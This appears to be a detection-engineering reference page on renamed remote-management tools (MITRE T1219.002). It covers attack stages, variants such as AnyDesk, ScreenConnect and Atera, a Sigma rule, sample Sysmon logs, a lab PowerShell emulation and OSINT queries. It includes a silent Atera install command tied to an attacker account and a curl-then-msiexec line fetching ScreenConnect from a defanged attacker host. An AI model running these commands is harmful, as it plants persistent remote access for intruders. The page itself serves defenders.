← All Chokepoints HIGH

Renamed RMM Tools

Initial Access Command and Control T1219.002 Detection difficulty: MEDIUM Prevalence: HIGH

Legitimate remote management and monitoring (RMM) tools are renamed or masqueraded to appear as trusted applications (tax documents, invoices, IT support tools) and delivered via browser download. Once executed, the RMM establishes persistent command-and-control to attacker infrastructure while appearing to be a signed, legitimate binary. Because the binary is legitimately signed by the vendor, many security tools will not flag it. The chokepoint is the browser download, file masquerading, user execution, and outbound connection to RMM infrastructure. All of which are required regardless of which RMM tool is used.

By @iimp0ster · Updated 2026-03-07 · View source YAML

Attack Chokepoints 3 invariant stages

Each stage is an invariant condition the attacker must satisfy, regardless of tool, variant, or threat actor. Detection at any stage breaks the chain.

1 Browser Download
Prerequisites
  • User account can execute binaries from browser download paths (Downloads, Temp, AppData)
  • RMM binary carries a valid vendor code-signing certificate; hash-based detection does not fire
Input User clicks a link or is directed to download a file from an attacker-controlled or compromised site
Chokepoint Browser process creates an executable in a user-writable path (Downloads, Temp, AppData) with a campaign-themed or generic filename masking RMM software
Observable Sysmon EID 11 showing browser process (chrome.exe, msedge.exe) writing an executable to Downloads/Temp. File hash matches a known RMM tool despite the campaign-themed filename.
Why unavoidable
The binary must land on disk before execution. No in-memory-only path exists for the initial delivery of a standalone RMM installer; the file must be hosted on an attacker-controlled or compromised site reachable by the victim's browser, so delivery cannot be skipped in any variant including TOAD phone-assisted delivery
Data Sources
  • Sysmon Event ID 11 (File Creation)
  • Browser download telemetry
View rule →
RMM binary exists on disk with a masqueraded filename
2 User Execution
Input RMM binary exists on disk with a masqueraded filename
Chokepoint User executes the downloaded binary, which is a legitimately-signed RMM tool regardless of its filename. PE metadata (OriginalFilename, Company) betrays the mismatch
Observable Sysmon EID 1 showing process creation where Image filename differs from PE OriginalFilename metadata. For example: Image=tax_form.exe but OriginalFilename=AnyDesk.exe or Company=philandro Software GmbH.
Why unavoidable
The binary must execute to establish C2. No execution means no remote access regardless of delivery success
Data Sources
  • Sysmon Event ID 1 (Process Creation)
  • Windows Security Event ID 4688 (Process Creation)
Bypass risk: CVE exploitation of internet-exposed RMM servers (ScreenConnect CVE-2024-1709, SimpleHelp CVE-2024-57727) bypasses all user-execution detection. Monitor RMM server process telemetry separately
View rule →
RMM process is running on the endpoint
3 Outbound RMM Connection
Input RMM process is running on the endpoint
Chokepoint Executed binary establishes a persistent connection to RMM relay or attacker-controlled server on standard HTTPS ports
Observable Sysmon EID 3 showing outbound HTTPS connection from a process whose Image path is in a user-writable directory to known RMM relay domains or self-hosted infrastructure.
Why unavoidable
The C2 channel must be established. The entire purpose of RMM tool deployment is persistent remote access
Data Sources
  • Sysmon Event ID 3 (Network Connection)
  • Firewall / proxy egress logs
Bypass risk: Self-hosted RMM infrastructure (RustDesk, MeshCentral) makes domain-based blocking ineffective. Detect by behavior (browser download + execution + outbound), not by destination
View rule →

Variations 9 variants tracked

Tools and methods that exploit this chokepoint. The list grows. The chokepoint doesn't change.

AnyDesk 2020 Declining
Common masquerade names: invoice.exe, tax_form.exe, SSN_verification.exe; February 2024 production server breach resulted in source code and code signing certificate theft. Certificate revoked, driving threat actor migration to other tools
Command / artifacts
Most common renamed RMM in 2023-2024. Filename-to-metadata mismatch is the detection signal. AnyDesk code signing cert stolen and revoked February 2024.
# User downloads "Invoice_2024.exe" via browser
# PE metadata reveals: OriginalFilename = "AnyDesk.exe", Company = "AnyDesk Software GmbH"
# Execution establishes C2 to *.net.anydesk.com relay
# Attacker's AnyDesk ID connects to victim's session
  • Sysmon EID 11: Executable written to Downloads/Temp by browser process
  • Sysmon EID 1: Process where Image filename differs from OriginalFilename in PE header
  • Sysmon EID 3: Outbound to *.net.anydesk.com on 443/6568
  • Sysmon EID 13: AnyDesk registry keys created despite different filename
Same chokepoint: Browser download → renamed binary execution (filename differs from PE metadata) → outbound to AnyDesk relay
Source: www.cisa.gov →
TeamViewer 2019 Active
Common masquerade names: update.exe, system_check.exe
Command / artifacts
One of earliest RMM tools abused for C2 (since 2019). Often delivered as IT support tool during TOAD social engineering calls.
# User downloads "Meeting_Link.exe" or "Support_Tool.exe"
# PE metadata: OriginalFilename = "TeamViewer.exe", Company = "TeamViewer Germany GmbH"
# Establishes connection to *.teamviewer.com relay
  • Sysmon EID 11: Executable downloaded by browser with non-TeamViewer name
  • Sysmon EID 1: Process where filename differs from TeamViewer PE metadata
  • Sysmon EID 3: Outbound to *.teamviewer.com
Same chokepoint: Browser download → renamed TeamViewer execution → outbound to teamviewer.com relay
Source: www.proofpoint.com →
ScreenConnect (ConnectWise) 2022 Active
Common masquerade names: support_tool.exe, IT_access.exe; now primary choice for renamed-binary delivery; February 2024 CVE-2024-1709 (auth bypass) + CVE-2024-1708 (path traversal) enabled direct server exploitation by LockBit, Black Basta, and Bl00dy. 18,188 exposed instances globally at time of disclosure; dual vector: user-delivered binary AND direct server exploitation
Command / artifacts
Primary RMM in campaign use since 2022. CISA AA23-025A. CVE-2024-1709 (auth bypass) enabled direct exploitation of 18,000+ exposed instances.
# User downloads "SecurityUpdate.exe" or "TaxForm_2024.msi"
# MSI installs ScreenConnect client silently
# Connects to attacker-controlled instance:
#   hxxps[://]attacker-instance[.]screenconnect[.]com
# or self-hosted: hxxps[://]attacker-server[.]com:8040
  • Sysmon EID 11: MSI/EXE downloaded by browser with campaign-themed name
  • Sysmon EID 1: ScreenConnect.ClientService.exe installed
  • Sysmon EID 3: Outbound HTTPS to *.screenconnect.com or non-standard port
  • Windows System EID 7045: ScreenConnect service installed
Same chokepoint: Browser download → MSI/EXE install → ScreenConnect service created → HTTPS C2 to attacker instance
Source: unit42.paloaltonetworks.com →
UltraViewer 2023 Active
Common masquerade names: security_scan.exe, verify.exe
Command / artifacts
Adopted to evade AnyDesk-specific detections. Less monitored by security tools due to lower market share.
# User downloads "Document_Viewer.exe"
# PE metadata: OriginalFilename = "UltraViewer.exe"
# Connects to UltraViewer relay infrastructure
  • Sysmon EID 11: Executable with non-UltraViewer filename
  • Sysmon EID 1: Process with UltraViewer PE metadata from Downloads/Temp
  • Sysmon EID 3: Outbound to UltraViewer relay
Same chokepoint: Browser download → renamed UltraViewer execution → outbound to UltraViewer relay
Source: www.seqrite.com →
RustDesk 2023 Active
Open-source; self-hosted infrastructure makes domain blocking ineffective; first documented in Akira ransomware and Scattered Spider operations mid-2023; broader adoption through 2024
Command / artifacts
Self-hosted = domain/IP blocking ineffective. Adopted by Akira and Scattered Spider. Detection must be behavioral, not domain-based.
# Open-source self-hosted RMM — no vendor relay to block
# Attacker runs their own RustDesk server
# Victim downloads renamed rustdesk.exe
# Config points to attacker relay: hxxps[://]attacker-relay[.]com:21116
  • Sysmon EID 11: rustdesk.exe written with non-standard filename
  • Sysmon EID 1: Process with RustDesk PE metadata from unexpected path
  • Sysmon EID 3: Outbound to non-standard IP on port 21116/21117
Same chokepoint: Browser download → renamed rustdesk.exe execution → outbound to self-hosted relay (no vendor domain to block)
Source: asec.ahnlab.com →
SimpleHelp 2025-Q1 Active
CVE-2024-57727 (path traversal), CVE-2024-57726 (privilege escalation), CVE-2024-57728 (arbitrary file upload) disclosed January 2025; exploited in the wild since January 22, 2025 as ransomware initial access vector; DragonForce deployed via it; CISA advisory AA25-163A issued June 2025; CISA KEV listed February 2025
Command / artifacts
Three critical CVEs (Jan 2025) enabled exploitation of 18,000+ exposed instances. Both social engineering AND server-side paths. Used by DragonForce for ransomware.
# Two attack paths:
# Path 1: Renamed binary (social engineering) — PE metadata mismatch
# Path 2: CVE exploitation (server-side):
# CVE-2024-57727 (path traversal) + CVE-2024-57726 (privesc) + CVE-2024-57728 (RCE)
  • Path 1: Same as other renamed RMM (PE metadata mismatch)
  • Path 2: SimpleHelp server logs showing exploitation
  • Sysmon EID 3: Outbound from SimpleHelp client to attacker instance
Same chokepoint: Social eng delivery OR CVE exploitation → SimpleHelp session → attacker remote access
Source: www.cisa.gov →
NetSupport Manager 2019 Active
Long-abused RMM (the 'NetSupport RAT' name derives from this tool); TA571 and the ClearFake cluster began ClickFix clipboard delivery specifically in March 2024; remains one of the most common RMM payloads in commodity phishing operations through 2025
Command / artifacts
Legitimate remote support tool abused since 2019. Config file (client32.ini) points to attacker gateway. Often delivered via ClickFix campaigns.
# Drops NetSupport client files to AppData or ProgramData:
# client32.exe + client32.ini (attacker gateway config)
# client32.ini contains:
# [HTTP]
# Gateway=hxxps[://]attacker-gateway[.]com
  • Sysmon EID 11: client32.exe + client32.ini written to AppData/ProgramData
  • Sysmon EID 1: client32.exe running from non-standard path
  • Sysmon EID 3: Outbound to attacker gateway (not official NetSupport infra)
Same chokepoint: Payload delivery → client32.exe + ini deployed → NetSupport connects to attacker gateway
Source: www.esentire.com →
Atera 2022 Active
Used by MuddyWater (Iran/TA450) in nation-state campaigns since mid-2022; intense campaign wave October 2023–April 2024 targeting Israeli manufacturing, tech, and infosec sectors; also deployed post-compromise as secondary RMM after ScreenConnect CVE-2024-1709 exploitation in European targets
Command / artifacts
Cloud-based RMM. MSI registers agent to attacker Atera account. Uses legitimate Atera cloud; domain blocking difficult.
msiexec /i AteraSetup.msi /qn INTEGRATORLOGIN=attacker@email.com ACCOUNTID=<attacker_account>
# Silent install, agent registers to attacker's Atera account
  • Sysmon EID 1: msiexec.exe with /qn flag installing Atera MSI
  • Sysmon EID 11: AteraAgent.exe installed
  • Sysmon EID 3: Outbound to *.atera.com
Same chokepoint: MSI delivery → silent install → Atera agent registers to attacker account → cloud C2
Source: harfanglab.io →
RMM-to-RMM Deployment 2024 Active
One RMM (e.g., ScreenConnect) deploys a second RMM (e.g., AnyDesk) for redundancy. If one is removed, the other maintains access
Command / artifacts
Pattern emerged 2024-H2. First RMM deploys second for redundancy. Documented in Hunters International campaigns (AnyDesk + ScreenConnect simultaneously).
# First RMM deploys second as backup persistence:
cmd /c curl -o C:\Temp\ScreenConnect.msi hxxps[://]attacker-instance[.]screenconnect[.]com/Bin/ConnectWiseControl.ClientSetup.msi
msiexec /i C:\Temp\ScreenConnect.msi /qn
  • Sysmon EID 1: RMM process spawning cmd.exe → curl → msiexec
  • Sysmon EID 11: Second RMM installer written to disk
  • Sysmon EID 3: Two simultaneous outbound RMM connections to different relays
Same chokepoint: First RMM established → downloads second RMM → silent install → dual C2 channels
Source: www.microsoft.com →

Detection Strategy

Rules organized by the chokepoint stage they detect. Each stage has one or more rules at different maturity levels.

1 Browser Download
2 User Execution
3 Outbound RMM Connection
Identify all RMM tool processes running in the environment
Research High FP
Goal
Identify all RMM tool processes running in the environment
Log Sources
  • Sysmon Event ID 1 (Process Creation)
  • Windows Security Event ID 4688 (Process Creation)
  • Application inventory / software management telemetry
FP Rate
High
Use Case
Asset inventory; baseline of legitimate RMM usage by IT staff
Detection Logic
Process name matches known RMM binaries: anydesk.exe, screenconnect*.exe, teamviewer*.exe, ultraviewer.exe, rustdesk.exe, meshagent.exe, connectwisecontrol*.exe.
Sigma Rule — Research Level
GitHub → Download 
title: Known RMM Tool Process Execution
id: b8c2d4e6-f8a0-4b2c-9d3e-5f7a9b1c3d5e
status: experimental
description: >
  Detects execution of known RMM tool processes. Baseline rule for mapping approved
  vs. unapproved RMM usage across the environment.
references:
  - https://attack.mitre.org/techniques/T1219/
author: "@iimp0ster"
date: 2025/01/15
tags:
  - attack.initial_access
  - attack.command_and_control
  - attack.t1219
  - detection.maturity.research
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\anydesk.exe'
      - '\AnyDesk.exe'
      - '\TeamViewer.exe'
      - '\teamviewer.exe'
      - '\ultraviewer.exe'
      - '\UltraViewer.exe'
      - '\rustdesk.exe'
      - '\RustDesk.exe'
      - '\meshagent.exe'
      - '\MeshAgent.exe'
    Image|contains:
      - '\ScreenConnect.'
      - '\connectwisecontrol'
      - '\ConnectWiseControl'
  filter_legit_software:
    # Tune for your environment — add legitimate software that triggers this rule
    Image|endswith:
      - '\placeholder_tune_for_your_env.exe'
  condition: selection and not filter_legit_software
falsepositives:
  - Legitimate IT helpdesk use of RMM tools
  - Authorized remote support sessions
  - Security testing environments
level: informational

Raw Log Samples 3 samples

Real-world log events produced by this technique and which Sigma rules they trigger.

EID 11 Sysmon Renamed RMM binary dropped to Downloads folder by browser process
EventID: 11 (FileCreate) UtcTime: 2024-10-15 09:34:12.881 ProcessGuid: {c3d4e5f6-3456-7890-cdef-012345678901} ProcessId: 3284 Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe TargetFilename: C:\Users\jsmith\Downloads\tax-document-2024.exe CreationUtcTime: 2024-10-15 09:34:12.881 # Browser drops .exe directly to Downloads. Combined with execution signals Hunt/Analyst rules
EID 1 Sysmon Renamed RMM binary executed. OriginalFilename mismatch is the Analyst signal
EventID: 1 (Process Create) UtcTime: 2024-10-15 09:34:28.103 ProcessGuid: {c3d4e5f6-3456-7890-cdef-012345678902} ProcessId: 9876 Image: C:\Users\jsmith\Downloads\tax-document-2024.exe OriginalFileName: AnyDesk.exe CommandLine: "C:\Users\jsmith\Downloads\tax-document-2024.exe" CurrentDirectory: C:\Users\jsmith\Downloads\ ParentProcessId: 3284 ParentImage: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe FileVersion: 8.0.8.0 Description: AnyDesk Company: AnyDesk Software GmbH # KEY SIGNAL: Image=tax-document-2024.exe but OriginalFileName=AnyDesk.exe # File signer: AnyDesk Software GmbH certificate on a file named "tax-document-2024.exe"
EID 3 Sysmon Renamed AnyDesk binary connects to AnyDesk relay infrastructure
EventID: 3 (NetworkConnect) UtcTime: 2024-10-15 09:34:29.441 ProcessGuid: {c3d4e5f6-3456-7890-cdef-012345678902} ProcessId: 9876 Image: C:\Users\jsmith\Downloads\tax-document-2024.exe User: CORP\jsmith Protocol: tcp Initiated: true SourceIp: 10.10.5.22 SourcePort: 51876 DestinationIp: 195.201.29.30 DestinationHostname: relay.anydesk.com DestinationPort: 443 # Non-RMM-named binary connecting to relay.anydesk.com within 2 min of browser download

Emulation

ATT&CK: T1219.002 Simulates renamed RMM binary drop, execution with metadata mismatch, and outbound connection powershell ▶
Lab use only. Run in isolated lab VM only. Uses a benign Windows binary renamed to a campaign filename.
POWERSHELL
GitHub → Download 
#Requires -Version 5.1
# MITRE ATT&CK: T1219.002 — Remote Access Tools
# Simulates browser-downloaded RMM binary renamed to a campaign-themed filename.

[CmdletBinding()]
param(
    [string]$CampaignName  = 'tax-document-2024',
    [switch]$CleanupOnly
)

Set-StrictMode -Version Latest
$ErrorActionPreference = 'Stop'

# Use a legitimate signed Windows binary as the "RMM" stand-in for safe emulation.
# In a real engagement, replace this with actual AnyDesk.exe for full fidelity.
$RmmSourceBinary = Join-Path $env:WINDIR 'System32\notepad.exe'
$DownloadsPath   = Join-Path $env:USERPROFILE 'Downloads'
$RenamedBinary   = Join-Path $DownloadsPath "$CampaignName.exe"
$RmmPort         = 443    # AnyDesk relay uses 443/80/6568; use 443 for lab (less likely blocked)
$RmmHost         = 'relay.anydesk.com'

function Write-Step ([string]$Msg) { Write-Host "[*] $Msg" -ForegroundColor Cyan }
function Write-Ok   ([string]$Msg) { Write-Host "[+] $Msg" -ForegroundColor Green }
function Write-Warn ([string]$Msg) { Write-Host "[!] $Msg" -ForegroundColor Yellow }

function Remove-Artefacts {
    if (Test-Path $RenamedBinary) {
        Remove-Item $RenamedBinary -Force -ErrorAction SilentlyContinue
        Write-Ok "Removed: $RenamedBinary"
    }
}

if ($CleanupOnly) { Remove-Artefacts; exit 0 }

Write-Host ""
Write-Host "=== Renamed RMM Tool Emulation ===" -ForegroundColor Magenta
Write-Host "    T1219.002 | Detection Chokepoints Project" -ForegroundColor DarkGray
Write-Host ""

Write-Step "Step 1/3 — Dropping renamed binary to Downloads (browser-download simulation)"
Write-Verbose "  Source binary: $RmmSourceBinary"
Write-Verbose "  Renamed to:    $RenamedBinary"

# Ensure Downloads directory exists
if (-not (Test-Path $DownloadsPath)) {
    New-Item -ItemType Directory -Path $DownloadsPath -Force | Out-Null
}

Copy-Item -Path $RmmSourceBinary -Destination $RenamedBinary -Force
Write-Ok "Binary copied to: $RenamedBinary"
Write-Ok "File name: $CampaignName.exe (social engineering name)"

# Report OriginalFilename vs current name mismatch (the key detection signal)
try {
    $versionInfo = [System.Diagnostics.FileVersionInfo]::GetVersionInfo($RenamedBinary)
    Write-Host ""
    Write-Host "  File metadata (key detection signal):" -ForegroundColor White
    Write-Host "    CurrentName:       $CampaignName.exe" -ForegroundColor DarkGray
    Write-Host "    OriginalFilename:  $($versionInfo.OriginalFilename)" -ForegroundColor DarkGray
    Write-Host "    ProductName:       $($versionInfo.ProductName)" -ForegroundColor DarkGray
    Write-Host "    FileDescription:   $($versionInfo.FileDescription)" -ForegroundColor DarkGray
    if ($versionInfo.OriginalFilename -and $versionInfo.OriginalFilename -ne "$CampaignName.exe") {
        Write-Ok "MISMATCH CONFIRMED: OriginalFilename != current name — Analyst rule will fire"
    }
} catch {
    Write-Warn "Could not read version info: $_"
}

Start-Sleep -Milliseconds 500

Write-Step "Step 2/3 — Executing renamed binary (brief run to generate process telemetry)"
Write-Verbose "  Note: In real scenario, OriginalFilename=AnyDesk.exe vs. CurrentName=$CampaignName.exe"

try {
    # Start notepad briefly then kill it — generates EID 1 with the renamed image path
    $proc = Start-Process -FilePath $RenamedBinary -PassThru -ErrorAction Stop
    Start-Sleep -Milliseconds 800
    if (-not $proc.HasExited) {
        $proc.Kill()
        $proc.WaitForExit(2000) | Out-Null
    }
    Write-Ok "Renamed binary executed (PID $($proc.Id)) and terminated — Sysmon EID 1 generated"
} catch {
    Write-Warn "Binary execution failed: $_"
}

Start-Sleep -Milliseconds 300

Write-Step "Step 3/3 — Outbound connection to RMM relay port (network telemetry)"
Write-Verbose "  Target: $RmmHost`:$RmmPort"
Write-Warn "Note: real AnyDesk connects to relay.anydesk.com:443/80/6568; using TCP connect test only"

try {
    $tcp = New-Object System.Net.Sockets.TcpClient
    $async = $tcp.BeginConnect($RmmHost, $RmmPort, $null, $null)
    $connected = $async.AsyncWaitHandle.WaitOne(5000, $false)
    if ($connected) {
        $tcp.EndConnect($async)
        Write-Ok "TCP connection to $RmmHost`:$RmmPort succeeded — Sysmon EID 3 generated"
    } else {
        Write-Warn "TCP connect timed out (connection attempt still generated EID 3)"
    }
    $tcp.Close()
} catch {
    Write-Warn "Network connection failed (telemetry may still have fired): $_"
}

Write-Host ""
Write-Step "Cleaning up artefacts"
Remove-Artefacts

Write-Host ""
Write-Host "=== Emulation Complete ===" -ForegroundColor Magenta
Write-Host ""
Write-Host "Expected detections:" -ForegroundColor White
Write-Host "  [Research]  Sysmon EID 1 — process name matches known RMM tool OR OriginalFilename" -ForegroundColor DarkCyan
Write-Host "  [Hunt]      EID 11 (file in Downloads) + EID 1 (execution within 5 min)"            -ForegroundColor DarkYellow
Write-Host "  [Analyst]   Campaign filename + OriginalFilename mismatch + EID 3 to RMM infra"     -ForegroundColor DarkGreen
Write-Host ""
Write-Host "Higher fidelity: replace source binary with actual AnyDesk.exe for real metadata" -ForegroundColor DarkGray
Write-Host "  OriginalFilename=AnyDesk.exe vs. CurrentName=$CampaignName.exe is the key signal" -ForegroundColor DarkGray
Write-Host ""

OSINT Pivots

URLScan filename:MicrosoftTeams.msi OR filename:chrome_update.exe OR filename:security_scan.exe OR filename:verify.exe OR filename:support.exe
Targets documented masquerade filenames used in renamed RMM campaigns, including fake Teams installers (March 2026 signed malware campaign), fake Chrome updates (SocGholish/FakeUpdates), and security/support themed binaries (UltraViewer campaigns). Rotate with seasonal themes: tax-document, invoice, SSN, E-Invite, Party Card Viewer during relevant periods.
Shodan product:"ScreenConnect"
Find internet-exposed ScreenConnect instances; cross-reference against known legitimate MSP infrastructure to identify attacker-controlled deployments.
Censys services.tls.certificate.parsed.subject.common_name: "SimpleHelp"
Finds infrastructure presenting SimpleHelp TLS certificates; currently the most actively exploited RMM platform per CISA AA25-163A.
VirusTotal Intelligence have:itw tag:peexe (metadata:"AnyDesk" OR metadata:"ScreenConnect" OR metadata:"SimpleHelp" OR metadata:"NetSupport")
Requires VT Intelligence subscription; finds PE executables in the wild whose internal metadata references known RMM vendors; the core renamed-binary delivery mechanism.
LOLRMM
Community-maintained catalog of every known RMM tool with file metadata, network indicators, and detection heuristics for building renamed-binary analyst rules.